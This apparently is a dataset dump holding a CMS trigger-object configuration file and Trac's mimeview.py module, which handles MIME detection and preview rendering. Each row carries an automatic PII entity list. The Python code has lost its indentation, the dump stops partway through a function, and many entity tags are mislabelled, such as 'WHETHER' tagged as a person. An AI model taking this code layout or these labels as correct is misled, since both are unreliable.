| 10,886 | [['EMAIL_ADDRESS', 'dummy@email.com'], ['DATE_TIME', '2014'], ['PERSON', 'Greg von Winckel'], ['LOCATION', 'DAMAGES'], ['PERSON', 'WHETHER'], ['DATE_TIME', 'Wed Jan 1'], ['DATE_TIME', '2014'], ['PERSON', 'David A. Ham'], ['DATE_TIME', '2016'], ['PERSON', 'Walter Gautschi\n '], ['PERSON', 'Gene Golub'], ['DATE_TIME', 'April 1973'], ['LOCATION', 'P_{k+1}(x'], ['PERSON', 'Dirk Laurie'], ['PERSON', 'Walter Gautschi\n '], ['LOCATION', "ValueError('N"], ['PERSON', 'NOPT'], ['PERSON', 'Px'], ['PERSON', 'Px'], ['PERSON', 'NOPT'], ['PERSON', 'Walter Gautschi,``On'], ['PERSON', "James L. Blue''"], ['DATE_TIME', '33 (1979'], ['LOCATION', 'mm[0'], ['LOCATION', 'alpham'], ['PERSON', 'betam'], ['PERSON', 'John C. Wheeler'], ['NRP', 'Gaussian'], ['DATE_TIME', '1974'], ['PERSON', 'Walter Gautschi'], ['DATE_TIME', '2005'], ['LOCATION', "ValueError('N"], ['DATE_TIME', 'min(N'], ['LOCATION', 'rec_jaclog(N'], ['LOCATION', 'P_{k+1}(x'], ['URL', 'http://www.cs.purdue.edu/archives/2002/wxg/codes/gauss.m'], ['URL', 'http://www.cs.purdue.edu/archives/2002/wxg/codes/r_jacobi.m'], ['URL', 'https://www.cs.purdue.edu/archives/2002/wxg/codes/r_jacobi01.m'], ['URL', 'https://www.cs.purdue.edu/archives/2002/wxg/codes/mm_log.m'], ['URL', 'https://www.cs.purdue.edu/archives/2002/wxg/codes/chebyshev.m'], ['URL', 'https://www.cs.purdue.edu/archives/2002/wxg/codes/r_jaclog.m'], ['URL', 'orthopoly.py'], ['URL', 'email.com'], ['URL', 'numpy.li'], ['URL', 'np.re'], ['URL', 'numpy.li'], ['URL', 'np.ar'], ['URL', 'np.ar'], ['URL', 'np.ar'], ['URL', 'np.ar'], ['URL', 'np.ar'], ['URL', 'np.ar']] |
6 | ## @package TriggerObjectBlock_cfi
# Configuration file that defines the producer of ROOT-tuple for trigger objects.
#
# \author Subir Sarkar
# \author Rosamaria Venditti (INFN Bari, Bari University)
# \author Konstantin Androsov (University of Siena, INFN Pisa)
# \author Maria Teresa Grippo (University of Siena, INFN Pisa)
#
# Copyright 2011-2013 Subir Sarkar, Rosamaria Venditti (INFN Bari, Bari University)
# Copyright 2014 Konstantin Androsov dummy@email.com,
# Maria Teresa Grippo dummy@email.com
#
# This file is part of X->HH->bbTauTau.
#
# X->HH->bbTauTau is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 2 of the License, or
# (at your option) any later version.
#
# X->HH->bbTauTau is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with X->HH->bbTauTau. If not, see <http://www.gnu.org/licenses/>.
import FWCore.ParameterSet.Config as cms
triggerObjectBlock = cms.EDAnalyzer("TriggerObjectBlock",
verbosity = cms.int32(0),
hltInputTag = cms.InputTag('TriggerResults','','HLT'),
triggerEventTag = cms.InputTag('patTriggerEvent'),
hltPathsOfInterest = cms.vstring ("HLT_DoubleMu",
"HLT_Mu",
"HLT_IsoMu",
"HLT_TripleMu",
"IsoPFTau",
"TrkIsoT",
"HLT_Ele"),
May10ReRecoData = cms.bool(False)
)
| 1,844 | [['EMAIL_ADDRESS', 'dummy@email.com'], ['EMAIL_ADDRESS', 'dummy@email.com'], ['PERSON', 'Subir Sarkar'], ['PERSON', 'Rosamaria Venditti'], ['PERSON', 'Konstantin Androsov'], ['PERSON', 'Maria Teresa Grippo'], ['DATE_TIME', '2011-2013'], ['PERSON', 'Subir Sarkar'], ['PERSON', 'Rosamaria Venditti'], ['DATE_TIME', '2014'], ['PERSON', 'Konstantin Androsov'], ['PERSON', 'Maria Teresa Grippo'], ['PERSON', 'triggerEventTag = cms'], ['PERSON', "InputTag('patTriggerEvent"], ['URL', 'http://www.gnu.org/licenses/'], ['URL', 'email.com'], ['URL', 'email.com'], ['URL', 'FWCore.ParameterSet.Co'], ['URL', 'cms.int'], ['URL', 'cms.In'], ['URL', 'cms.In'], ['URL', 'cms.bo']] |
7 | # -*- coding: utf-8 -*-
#
# Copyright (C) 2004-2010 Edgewall Software
# Copyright (C) 2004 Daniel Lundin dummy@email.com
# Copyright (C) 2005-2006 Christopher Lenz dummy@email.com
# Copyright (C) 2006-2007 Christian Boos dummy@email.com
# All rights reserved.
#
# This software is licensed as described in the file COPYING, which
# you should have received as part of this distribution. The terms
# are also available at http://trac.edgewall.org/wiki/TracLicense.
#
# This software consists of voluntary contributions made by many
# individuals. For the exact contribution history, see the revision
# history and logs, available at http://trac.edgewall.org/log/.
#
# Author: Daniel Lundin dummy@email.com
# Christopher Lenz dummy@email.com
# Christian Boos dummy@email.com
"""
File metadata management
------------------------
The `trac.mimeview` package centralizes the intelligence related to
file metadata, principally concerning the `type` (MIME type) of the
content and, if relevant, concerning the text encoding (charset) used
by the content.
There are primarily two approaches for getting the MIME type of a
given file, either taking advantage of existing conventions for the
file name, or examining the file content and applying various
heuristics.
The module also knows how to convert the file content from one type to
another type.
In some cases, only the `url` pointing to the file's content is
actually needed, which is why we avoid reading the file's content when
it's not needed.
The actual `content` to be converted might be a `unicode` object, but
it can also be the raw byte string (`str`) object, or simply an object
that can be `read()`.
.. note:: (for plugin developers)
The Mimeview API is quite complex and many things there are
currently a bit difficult to work with (e.g. what an actual
`content` might be, see the last paragraph of this description).
So this area is mainly in a ''work in progress'' state, which will
be improved along the lines described in :teo:`#3332`.
In particular, if you are interested in writing `IContentConverter`
and `IHTMLPreviewRenderer` components, note that those interfaces
will be merged into a new style `IContentConverter`. Feel free to
contribute remarks and suggestions for improvements to the
corresponding ticket (#3332 as well).
"""
import re
from StringIO import StringIO
from genshi import Markup, Stream
from genshi.core import TEXT, START, END, START_NS, END_NS
from genshi.builder import Fragment, tag
from genshi.input import HTMLParser
from trac.config import IntOption, ListOption, Option
from trac.core import *
from trac.resource import Resource
from trac.util import Ranges, content_disposition
from trac.util.text import exception_to_unicode, to_utf8, to_unicode
from trac.util.translation import _, tag_
__all__ = ['Context', 'Mimeview', 'RenderingContext', 'get_mimetype',
'is_binary', 'detect_unicode', 'content_to_unicode', 'ct_mimetype']
class RenderingContext(object):
"""
A rendering context specifies ''how'' the content should be rendered.
    It holds together all the contextual information that will be
    needed by individual renderer components.
To that end, a context keeps track of the Href instance (`.href`) which
should be used as a base for building URLs.
It also provides a `PermissionCache` (`.perm`) which can be used to
restrict the output so that only the authorized information is shown.
A rendering context may also be associated to some Trac resource which
will be used as the implicit reference when rendering relative links
or for retrieving relative content and can be used to retrieve related
metadata.
Rendering contexts can be nested, and a new context can be created from
an existing context using the call syntax. The previous context can be
retrieved using the `.parent` attribute.
For example, when rendering a wiki text of a wiki page, the context will
be associated to a resource identifying that wiki page.
If that wiki text contains a `[[TicketQuery]]` wiki macro, the macro will
set up nested contexts for each matching ticket that will be used for
rendering the ticket descriptions.
:since: version 0.11
"""
def __init__(self, resource, href=None, perm=None):
"""Directly create a `RenderingContext`.
:param resource: the associated resource
:type resource: `Resource`
:param href: an `Href` object suitable for creating URLs
:param perm: a `PermissionCache` object used for restricting the
generated output to "authorized" information only.
The actual `.perm` attribute of the rendering context will be bound
to the given `resource` so that fine-grained permission checks will
apply to that.
"""
self.parent = None #: The parent context, if any
self.resource = resource
self.href = href
self.perm = perm(resource) if perm and resource else perm
self._hints = None
@staticmethod
def from_request(*args, **kwargs):
""":deprecated: since 1.0, use `web_context` instead."""
from trac.web.chrome import web_context
return web_context(*args, **kwargs)
def __repr__(self):
path = []
context = self
while context:
if context.resource.realm: # skip toplevel resource
path.append(repr(context.resource))
context = context.parent
return '<%s %s>' % (type(self).__name__, ' - '.join(reversed(path)))
def child(self, resource=None, id=False, version=False, parent=False):
"""Create a nested rendering context.
`self` will be the parent for the new nested context.
:param resource: either a `Resource` object or the realm string for a
resource specification to be associated to the new
context. If `None`, the resource will be the same
as the resource of the parent context.
:param id: the identifier part of the resource specification
:param version: the version of the resource specification
:return: the new context object
:rtype: `RenderingContext`
>>> context = RenderingContext('wiki', 'WikiStart')
>>> ticket1 = Resource('ticket', 1)
>>> context.child('ticket', 1).resource == ticket1
True
>>> context.child(ticket1).resource is ticket1
True
>>> context.child(ticket1)().resource is ticket1
True
"""
if resource:
resource = Resource(resource, id=id, version=version,
parent=parent)
else:
resource = self.resource
context = RenderingContext(resource, href=self.href, perm=self.perm)
context.parent = self
# hack for context instances created by from_request()
# this is needed because various parts of the code rely on a request
# object being available, but that will hopefully improve in the
# future
if hasattr(self, 'req'):
context.req = self.req
return context
__call__ = child
def __contains__(self, resource):
"""Check whether a resource is in the rendering path.
        The primary use for this check is to avoid rendering the content of a
resource if we're already embedded in a context associated to that
resource.
:param resource: a `Resource` specification which will be checked for
"""
context = self
while context:
if context.resource and \
context.resource.realm == resource.realm and \
context.resource.id == resource.id:
# we don't care about version here
return True
context = context.parent
# Rendering hints
#
# A rendering hint is a key/value pairs that can influence renderers,
# wiki formatters and processors in the way they produce their output.
# The keys are strings, but the values could be anything.
#
# In nested contexts, the hints are inherited from their parent context,
    # unless overridden locally.
def set_hints(self, **keyvalues):
"""Set rendering hints for this rendering context.
>>> ctx = RenderingContext('timeline')
>>> ctx.set_hints(wiki_flavor='oneliner', shorten_lines=True)
>>> t_ctx = ctx('ticket', 1)
>>> t_ctx.set_hints(wiki_flavor='html', preserve_newlines=True)
>>> (t_ctx.get_hint('wiki_flavor'), t_ctx.get_hint('shorten_lines'), \
t_ctx.get_hint('preserve_newlines'))
('html', True, True)
>>> (ctx.get_hint('wiki_flavor'), ctx.get_hint('shorten_lines'), \
ctx.get_hint('preserve_newlines'))
('oneliner', True, None)
"""
if self._hints is None:
self._hints = {}
hints = self._parent_hints()
if hints is not None:
self._hints.update(hints)
self._hints.update(keyvalues)
def get_hint(self, hint, default=None):
"""Retrieve a rendering hint from this context or an ancestor context.
>>> ctx = RenderingContext('timeline')
>>> ctx.set_hints(wiki_flavor='oneliner')
>>> t_ctx = ctx('ticket', 1)
>>> t_ctx.get_hint('wiki_flavor')
'oneliner'
>>> t_ctx.get_hint('preserve_newlines', True)
True
"""
hints = self._hints
if hints is None:
hints = self._parent_hints()
if hints is None:
return default
return hints.get(hint, default)
def has_hint(self, hint):
"""Test whether a rendering hint is defined in this context or in some
ancestor context.
>>> ctx = RenderingContext('timeline')
>>> ctx.set_hints(wiki_flavor='oneliner')
>>> t_ctx = ctx('ticket', 1)
>>> t_ctx.has_hint('wiki_flavor')
True
>>> t_ctx.has_hint('preserve_newlines')
False
"""
hints = self._hints
if hints is None:
hints = self._parent_hints()
if hints is None:
return False
return hint in hints
def _parent_hints(self):
p = self.parent
while p and p._hints is None:
p = p.parent
return p and p._hints
class Context(RenderingContext):
""":deprecated: old name kept for compatibility, use `RenderingContext`."""
# Some common MIME types and their associated keywords and/or file extensions
KNOWN_MIME_TYPES = {
'application/javascript': 'js',
'application/msword': 'doc dot',
'application/pdf': 'pdf',
'application/postscript': 'ps',
'application/rtf': 'rtf',
'application/x-sh': 'sh',
'application/x-csh': 'csh',
'application/x-troff': 'nroff roff troff',
'application/x-yaml': 'yml yaml',
'application/rss+xml': 'rss',
'application/xsl+xml': 'xsl',
'application/xslt+xml': 'xslt',
'image/x-icon': 'ico',
'image/svg+xml': 'svg',
'model/vrml': 'vrml wrl',
'text/css': 'css',
'text/html': 'html htm',
'text/plain': 'txt TXT text README INSTALL '
'AUTHORS COPYING ChangeLog RELEASE',
'text/xml': 'xml',
# see also TEXT_X_TYPES below
'text/x-csrc': 'c xs',
'text/x-chdr': 'h',
'text/x-c++src': 'cc CC cpp C c++ C++',
'text/x-c++hdr': 'hh HH hpp H',
'text/x-csharp': 'cs c# C#',
'text/x-diff': 'patch',
'text/x-eiffel': 'e',
'text/x-elisp': 'el',
'text/x-fortran': 'f',
'text/x-haskell': 'hs',
'text/x-ini': 'ini cfg',
'text/x-objc': 'm mm',
'text/x-ocaml': 'ml mli',
'text/x-makefile': 'make mk Makefile GNUMakefile',
'text/x-pascal': 'pas',
'text/x-perl': 'pl pm PL',
'text/x-php': 'php3 php4',
'text/x-python': 'py',
'text/x-pyrex': 'pyx',
'text/x-ruby': 'rb',
'text/x-scheme': 'scm',
'text/x-textile': 'txtl',
'text/x-vba': 'vb vba bas',
'text/x-verilog': 'v',
'text/x-vhdl': 'vhd',
}
for t in KNOWN_MIME_TYPES.keys():
types = KNOWN_MIME_TYPES[t].split()
if t.startswith('text/x-'):
types.append(t[len('text/x-'):])
KNOWN_MIME_TYPES[t] = types
# extend the above with simple (text/x-<something>: <something>) mappings
TEXT_X_TYPES = """
ada asm asp awk idl inf java ksh lua m4 mail psp rfc rst sql tcl tex zsh
"""
for x in TEXT_X_TYPES.split():
KNOWN_MIME_TYPES.setdefault('text/x-%s' % x, []).append(x)
# Default mapping from keywords/extensions to known MIME types:
MIME_MAP = {}
for t, exts in KNOWN_MIME_TYPES.items():
MIME_MAP[t] = t
for e in exts:
MIME_MAP[e] = t
# Simple builtin autodetection from the content using a regexp
MODE_RE = re.compile(r"""
\#!.+?env\s+(\w+) # 1. look for shebang with env
| \#!(?:[/\w.-_]+/)?(\w+) # 2. look for regular shebang
| -\*-\s*(?:mode:\s*)?([\w+-]+)\s*-\*- # 3. look for Emacs' -*- mode -*-
| vim:.*?(?:syntax|filetype|ft)=(\w+) # 4. look for VIM's syntax=<n>
""", re.VERBOSE)
def get_mimetype(filename, content=None, mime_map=MIME_MAP):
"""Guess the most probable MIME type of a file with the given name.
`filename` is either a filename (the lookup will then use the suffix)
or some arbitrary keyword.
`content` is either a `str` or an `unicode` string.
"""
suffix = filename.split('.')[-1]
if suffix in mime_map:
# 1) mimetype from the suffix, using the `mime_map`
return mime_map[suffix]
else:
mimetype = None
try:
import mimetypes
# 2) mimetype from the suffix, using the `mimetypes` module
mimetype = mimetypes.guess_type(filename)[0]
except Exception:
pass
if not mimetype and content:
match = re.search(MODE_RE, content[:1000] + content[-1000:])
if match:
mode = match.group(1) or match.group(2) or match.group(4) or \
match.group(3).lower()
if mode in mime_map:
# 3) mimetype from the content, using the `MODE_RE`
return mime_map[mode]
else:
if is_binary(content):
# 4) mimetype from the content, using`is_binary`
return 'application/octet-stream'
return mimetype
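# Illustrative lookups (an added sketch; results assume the default MIME_MAP
# defined above):
#
#   get_mimetype('setup.py')                          # 1) suffix in MIME_MAP
#   -> 'text/x-python'
#   get_mimetype('noext', '#!/usr/bin/env python\n')  # 3) shebang in content
#   -> 'text/x-python'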
def ct_mimetype(content_type):
"""Return the mimetype part of a content type."""
return (content_type or '').split(';')[0].strip()
def is_binary(data):
"""Detect binary content by checking the first thousand bytes for zeroes.
Operate on either `str` or `unicode` strings.
"""
if isinstance(data, str) and detect_unicode(data):
return False
return '\0' in data[:1000]
def detect_unicode(data):
"""Detect different unicode charsets by looking for BOMs (Byte Order Mark).
Operate obviously only on `str` objects.
"""
if data.startswith('\xff\xfe'):
return 'utf-16-le'
elif data.startswith('\xfe\xff'):
return 'utf-16-be'
elif data.startswith('\xef\xbb\xbf'):
return 'utf-8'
else:
return None
def content_to_unicode(env, content, mimetype):
"""Retrieve an `unicode` object from a `content` to be previewed.
    In case the raw content had a unicode BOM, we remove it.
>>> from trac.test import EnvironmentStub
>>> env = EnvironmentStub()
>>> content_to_unicode(env, u"\ufeffNo BOM! h\u00e9 !", '')
u'No BOM! h\\xe9 !'
>>> content_to_unicode(env, "\xef\xbb\xbfNo BOM! h\xc3\xa9 !", '')
u'No BOM! h\\xe9 !'
"""
mimeview = Mimeview(env)
if hasattr(content, 'read'):
content = content.read(mimeview.max_preview_size)
u = mimeview.to_unicode(content, mimetype)
if u and u[0] == u'\ufeff':
u = u[1:]
return u
class IHTMLPreviewRenderer(Interface):
"""Extension point interface for components that add HTML renderers of
specific content types to the `Mimeview` component.
.. note::
This interface will be merged with IContentConverter, as
conversion to text/html will simply be a particular content
conversion.
Note however that the IHTMLPreviewRenderer will still be
supported for a while through an adapter, whereas the
IContentConverter interface itself will be changed.
So if all you want to do is convert to HTML and don't feel like
following the API changes, you should rather implement this
interface for the time being.
"""
#: implementing classes should set this property to True if they
#: support text content where Trac should expand tabs into spaces
expand_tabs = False
#: indicate whether the output of this renderer is source code that can
#: be decorated with annotations
returns_source = False
def get_quality_ratio(mimetype):
"""Return the level of support this renderer provides for the `content`
of the specified MIME type. The return value must be a number between
0 and 9, where 0 means no support and 9 means "perfect" support.
"""
def render(context, mimetype, content, filename=None, url=None):
"""Render an XHTML preview of the raw `content` in a RenderingContext.
The `content` might be:
* a `str` object
* an `unicode` string
* any object with a `read` method, returning one of the above
It is assumed that the content will correspond to the given `mimetype`.
Besides the `content` value, the same content may eventually
be available through the `filename` or `url` parameters.
This is useful for renderers that embed objects, using <object> or
<img> instead of including the content inline.
Can return the generated XHTML text as a single string or as an
iterable that yields strings. In the latter case, the list will
be considered to correspond to lines of text in the original content.
"""
class IHTMLPreviewAnnotator(Interface):
"""Extension point interface for components that can annotate an XHTML
representation of file contents with additional information."""
def get_annotation_type():
"""Return a (type, label, description) tuple
that defines the type of annotation and provides human readable names.
The `type` element should be unique to the annotator.
The `label` element is used as column heading for the table,
while `description` is used as a display name to let the user
toggle the appearance of the annotation type.
"""
def get_annotation_data(context):
"""Return some metadata to be used by the `annotate_row` method below.
This will be called only once, before lines are processed.
If this raises an error, that annotator won't be used.
"""
def annotate_row(context, row, number, line, data):
"""Return the XHTML markup for the table cell that contains the
annotation data.
`context` is the context corresponding to the content being annotated,
`row` is the tr Element being built, `number` is the line number being
processed and `line` is the line's actual content.
`data` is whatever additional data the `get_annotation_data` method
decided to provide.
"""
class IContentConverter(Interface):
"""An extension point interface for generic MIME based content
conversion.
.. note:: This api will likely change in the future (see :teo:`#3332`)
"""
def get_supported_conversions():
"""Return an iterable of tuples in the form (key, name, extension,
in_mimetype, out_mimetype, quality) representing the MIME conversions
supported and
the quality ratio of the conversion in the range 0 to 9, where 0 means
        no support and 9 means "perfect" support, e.g. ('latex', 'LaTeX', 'tex',
'text/x-trac-wiki', 'text/plain', 8)"""
def convert_content(req, mimetype, content, key):
"""Convert the given content from mimetype to the output MIME type
represented by key. Returns a tuple in the form (content,
output_mime_type) or None if conversion is not possible."""
class Content(object):
"""A lazy file-like object that only reads `input` if necessary."""
def __init__(self, input, max_size):
self.input = input
self.max_size = max_size
self.content = None
def read(self, size=-1):
if size == 0:
return ''
if self.content is None:
self.content = StringIO(self.input.read(self.max_size))
return self.content.read(size)
def reset(self):
if self.content is not None:
self.content.seek(0)
class Mimeview(Component):
"""Generic HTML renderer for data, typically source code."""
required = True
renderers = ExtensionPoint(IHTMLPreviewRenderer)
annotators = ExtensionPoint(IHTMLPreviewAnnotator)
converters = ExtensionPoint(IContentConverter)
default_charset = Option('trac', 'default_charset', 'utf-8',
"""Charset to be used when in doubt.""")
tab_width = IntOption('mimeviewer', 'tab_width', 8,
"""Displayed tab width in file preview. (''since 0.9'')""")
max_preview_size = IntOption('mimeviewer', 'max_preview_size', 262144,
"""Maximum file size for HTML preview. (''since 0.9'')""")
mime_map = ListOption('mimeviewer', 'mime_map',
'text/x-dylan:dylan, text/x-idl:ice, text/x-ada:ads:adb',
doc="""List of additional MIME types and keyword mappings.
Mappings are comma-separated, and for each MIME type,
there's a colon (":") separated list of associated keywords
or file extensions. (''since 0.10'')""")
treat_as_binary = ListOption('mimeviewer', 'treat_as_binary',
'application/octet-stream, application/pdf, application/postscript, '
'application/msword,application/rtf,',
doc="""Comma-separated list of MIME types that should be treated as
binary data. (''since 0.11.5'')""")
def __init__(self):
self._mime_map = None
# Public API
def get_supported_conversions(self, mimetype):
"""Return a list of target MIME types in same form as
`IContentConverter.get_supported_conversions()`, but with the converter
component appended. Output is ordered from best to worst quality."""
converters = []
for converter in self.converters:
conversions = converter.get_supported_conversions() or []
for k, n, e, im, om, q in conversions:
if im == mimetype and q > 0:
converters.append((k, n, e, im, om, q, converter))
converters = sorted(converters, key=lambda i: i[-2], reverse=True)
return converters
def convert_content(self, req, mimetype, content, key, filename=None,
url=None):
"""Convert the given content to the target MIME type represented by
`key`, which can be either a MIME type or a key. Returns a tuple of
(content, output_mime_type, extension)."""
if not content:
return ('', 'text/plain;charset=utf-8', '.txt')
# Ensure we have a MIME type for this content
full_mimetype = mimetype
if not full_mimetype:
if hasattr(content, 'read'):
content = content.read(self.max_preview_size)
full_mimetype = self.get_mimetype(filename, content)
if full_mimetype:
mimetype = ct_mimetype(full_mimetype) # split off charset
else:
mimetype = full_mimetype = 'text/plain' # fallback if not binary
# Choose best converter
candidates = list(self.get_supported_conversions(mimetype) or [])
candidates = [c for c in candidates if key in (c[0], c[4])]
if not candidates:
raise TracError(
_("No available MIME conversions from %(old)s to %(new)s",
old=mimetype, new=key))
# First successful conversion wins
for ck, name, ext, input_mimettype, output_mimetype, quality, \
converter in candidates:
output = converter.convert_content(req, mimetype, content, ck)
if output:
return (output[0], output[1], ext)
raise TracError(
_("No available MIME conversions from %(old)s to %(new)s",
old=mimetype, new=key))
def get_annotation_types(self):
"""Generator that returns all available annotation types."""
for annotator in self.annotators:
yield annotator.get_annotation_type()
def render(self, context, mimetype, content, filename=None, url=None,
annotations=None, force_source=False):
"""Render an XHTML preview of the given `content`.
`content` is the same as an `IHTMLPreviewRenderer.render`'s
`content` argument.
The specified `mimetype` will be used to select the most appropriate
`IHTMLPreviewRenderer` implementation available for this MIME type.
        If not given, the MIME type will be inferred from the filename or the
content.
Return a string containing the XHTML text.
When rendering with an `IHTMLPreviewRenderer` fails, a warning is added
to the request associated with the context (if any), unless the
`disable_warnings` hint is set to `True`.
"""
if not content:
return ''
if not isinstance(context, RenderingContext):
raise TypeError("RenderingContext expected (since 0.11)")
# Ensure we have a MIME type for this content
full_mimetype = mimetype
if not full_mimetype:
if hasattr(content, 'read'):
content = content.read(self.max_preview_size)
full_mimetype = self.get_mimetype(filename, content)
if full_mimetype:
mimetype = ct_mimetype(full_mimetype) # split off charset
else:
mimetype = full_mimetype = 'text/plain' # fallback if not binary
# Determine candidate `IHTMLPreviewRenderer`s
candidates = []
for renderer in self.renderers:
qr = renderer.get_quality_ratio(mimetype)
if qr > 0:
candidates.append((qr, renderer))
candidates.sort(lambda x, y: cmp(y[0], x[0]))
# Wrap file-like object so that it can be read multiple times
if hasattr(content, 'read'):
content = Content(content, self.max_preview_size)
# First candidate which renders successfully wins.
# Also, we don't want to expand tabs more than once.
expanded_content = None
for qr, renderer in candidates:
if force_source and not getattr(renderer, 'returns_source', False):
continue # skip non-source renderers in force_source mode
if isinstance(content, Content):
content.reset()
try:
ann_names = ', '.join(annotations) if annotations else \
'no annotations'
self.log.debug('Trying to render HTML preview using %s [%s]',
renderer.__class__.__name__, ann_names)
# check if we need to perform a tab expansion
rendered_content = content
if getattr(renderer, 'expand_tabs', False):
if expanded_content is None:
content = content_to_unicode(self.env, content,
full_mimetype)
expanded_content = content.expandtabs(self.tab_width)
rendered_content = expanded_content
result = renderer.render(context, full_mimetype,
rendered_content, filename, url)
if not result:
continue
if not (force_source or getattr(renderer, 'returns_source',
False)):
# Direct rendering of content
if isinstance(result, basestring):
if not isinstance(result, unicode):
result = to_unicode(result)
return Markup(to_unicode(result))
elif isinstance(result, Fragment):
return result.generate()
else:
return result
# Render content as source code
if annotations:
m = context.req.args.get('marks') if context.req else None
return self._render_source(context, result, annotations,
m and Ranges(m))
else:
if isinstance(result, list):
result = Markup('\n').join(result)
return tag.div(class_='code')(tag.pre(result)).generate()
except Exception, e:
self.log.warning('HTML preview using %s failed: %s',
renderer.__class__.__name__,
exception_to_unicode(e, traceback=True))
if context.req and not context.get_hint('disable_warnings'):
from trac.web.chrome import add_warning
add_warning(context.req,
_("HTML preview using %(renderer)s failed (%(err)s)",
renderer=renderer.__class__.__name__,
err=exception_to_unicode(e)))
def _render_source(self, context, stream, annotations, marks=None):
from trac.web.chrome import add_warning
annotators, labels, titles = {}, {}, {}
for annotator in self.annotators:
atype, alabel, atitle = annotator.get_annotation_type()
if atype in annotations:
labels[atype] = alabel
titles[atype] = atitle
annotators[atype] = annotator
annotations = [a for a in annotations if a in annotators]
if isinstance(stream, list):
stream = HTMLParser(StringIO(u'\n'.join(stream)))
elif isinstance(stream, unicode):
text = stream
def linesplitter():
for line in text.splitlines(True):
yield TEXT, line, (None, -1, -1)
stream = linesplitter()
annotator_datas = []
for a in annotations:
annotator = annotators[a]
try:
data = (annotator, annotator.get_annotation_data(context))
except TracError, e:
self.log.warning("Can't use annotator '%s': %s", a, e.message)
add_warning(context.req, tag.strong(
tag_("Can't use %(annotator)s annotator: %(error)s",
annotator=tag.em(a), error=tag.pre(e.message))))
data = (None, None)
annotator_datas.append(data)
def _head_row():
return tag.tr(
[tag.th(labels[a], class_=a, title=titles[a])
for a in annotations] +
[tag.th(u'\xa0', class_='content')]
)
def _body_rows():
for idx, line in enumerate(_group_lines(stream)):
row = tag.tr()
if marks and idx + 1 in marks:
row(class_='hilite')
for annotator, data in annotator_datas:
if annotator:
annotator.annotate_row(context, row, idx+1, line, data)
else:
row.append(tag.td())
row.append(tag.td(line))
yield row
return tag.table(class_='code')(
tag.thead(_head_row()),
tag.tbody(_body_rows())
)
def get_max_preview_size(self):
""":deprecated: use `max_preview_size` attribute directly."""
return self.max_preview_size
def get_charset(self, content='', mimetype=None):
"""Infer the character encoding from the `content` or the `mimetype`.
`content` is either a `str` or an `unicode` object.
The charset will be determined using this order:
* from the charset information present in the `mimetype` argument
* auto-detection of the charset from the `content`
* the configured `default_charset`
"""
if mimetype:
ctpos = mimetype.find('charset=')
if ctpos >= 0:
return mimetype[ctpos + 8:].strip()
if isinstance(content, str):
utf = detect_unicode(content)
if utf is not None:
return utf
return self.default_charset
@property
def mime_map(self):
# Extend default extension to MIME type mappings with configured ones
if not self._mime_map:
self._mime_map = MIME_MAP.copy()
for mapping in self.config['mimeviewer'].getlist('mime_map'):
if ':' in mapping:
                    associations = mapping.split(':')
                    for keyword in associations: # Note: [0] kept on purpose
                        self._mime_map[keyword] = associations[0]
return self._mime_map
def get_mimetype(self, filename, content=None):
"""Infer the MIME type from the `filename` or the `content`.
`content` is either a `str` or an `unicode` object.
Return the detected MIME type, augmented by the
charset information (i.e. "<mimetype>; charset=..."),
or `None` if detection failed.
"""
mimetype = get_mimetype(filename, content, self.mime_map)
charset = None
if mimetype:
charset = self.get_charset(content, mimetype)
if mimetype and charset and not 'charset' in mimetype:
mimetype += '; charset=' + charset
return mimetype
def is_binary(self, mimetype=None, filename=None, content=None):
"""Check if a file must be considered as binary."""
if not mimetype and filename:
mimetype = self.get_mimetype(filename, content)
if mimetype:
mimetype = ct_mimetype(mimetype)
if mimetype in self.treat_as_binary:
return True
if content is not None and is_binary(content):
return True
return False
def to_utf8(self, content, mimetype=None):
"""Convert an encoded `content` to utf-8.
:deprecated: since 0.10, you should use `unicode` strings only.
"""
return to_utf8(content, self.get_charset(content, mimetype))
def to_unicode(self, content, mimetype=None, charset=None):
"""Convert `content` (an encoded `str` object) to an `unicode` object.
This calls `trac.util.to_unicode` with the `charset` provided,
or the one obtained by `Mimeview.get_charset()`.
"""
if not charset:
charset = self.get_charset(content, mimetype)
return to_unicode(content, charset)
def configured_modes_mapping(self, renderer):
"""Return a MIME type to `(mode,quality)` mapping for given `option`"""
types, option = {}, '%s_modes' % renderer
for mapping in self.config['mimeviewer'].getlist(option):
if not mapping:
continue
try:
mimetype, mode, quality = mapping.split(':')
types[mimetype] = (mode, int(quality))
except (TypeError, ValueError):
self.log.warning("Invalid mapping '%s' specified in '%s' "
"option.", mapping, option)
return types
def preview_data(self, context, content, length, mimetype, filename,
url=None, annotations=None, force_source=False):
"""Prepares a rendered preview of the given `content`.
Note: `content` will usually be an object with a `read` method.
"""
data = {'raw_href': url, 'size': length,
'max_file_size': self.max_preview_size,
'max_file_size_reached': False,
'rendered': None,
}
if length >= self.max_preview_size:
data['max_file_size_reached'] = True
else:
result = self.render(context, mimetype, content, filename, url,
annotations, force_source=force_source)
data['rendered'] = result
return data
def send_converted(self, req, in_type, content, selector, filename='file'):
"""Helper method for converting `content` and sending it directly.
`selector` can be either a key or a MIME Type."""
from trac.web.api import RequestDone
content, output_type, ext = self.convert_content(req, in_type,
content, selector)
if isinstance(content, unicode):
content = content.encode('utf-8')
req.send_response(200)
req.send_header('Content-Type', output_type)
req.send_header('Content-Length', len(content))
if filename:
req.send_header('Content-Disposition',
content_disposition(filename='%s.%s' %
(filename, ext)))
req.end_headers()
req.write(content)
raise RequestDone
def _group_lines(stream):
space_re = re.compile('(?P<spaces> (?: +))|^(?P<tag><\w+.*?>)?( )')
def pad_spaces(match):
m = match.group('spaces')
if m:
div, mod = divmod(len(m), 2)
return div * u'\xa0 ' + mod * u'\xa0'
return (match.group('tag') or '') + u'\xa0'
def _generate():
stack = []
def _reverse():
for event in reversed(stack):
if event[0] is START:
yield END, event[1][0], event[2]
else:
yield END_NS, event[1][0], event[2]
for kind, data, pos in stream:
if kind is TEXT:
lines = data.split('\n')
if lines:
# First element
for e in stack:
yield e
yield kind, lines.pop(0), pos
for e in _reverse():
yield e
# Subsequent ones, prefix with \n
for line in lines:
yield TEXT, '\n', pos
for e in stack:
yield e
yield kind, line, pos
for e in _reverse():
yield e
else:
if kind is START or kind is START_NS:
stack.append((kind, data, pos))
elif kind is END or kind is END_NS:
stack.pop()
else:
yield kind, data, pos
buf = []
